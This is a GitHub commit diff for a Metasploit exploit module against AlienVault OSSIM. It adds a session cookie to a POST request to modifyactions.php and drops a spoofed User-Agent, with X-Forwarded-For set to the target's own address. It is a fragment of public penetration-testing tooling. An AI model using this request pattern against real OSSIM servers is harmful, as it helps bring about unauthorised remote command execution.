Skip to content

Commit 906fcfe

Browse files
committed
OSSIM 5.0.0 version requires a authen token on action create
1 parent fdbed0f commit 906fcfe

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/linux/http/alienvault_exec.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -127,9 +127,9 @@ def exploit
127127
res = send_request_cgi({
128128
'method' => 'POST',
129129
'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
130+
'cookie' => cookie,
130131
'headers' => {
131132
'X-Forwarded-For' => rhost.to_s,
132-
'User-Agent' => 'AV Report Scheduler',
133133
},
134134
'vars_post' => {
135135
'id' => '',

0 commit comments

Comments
 (0)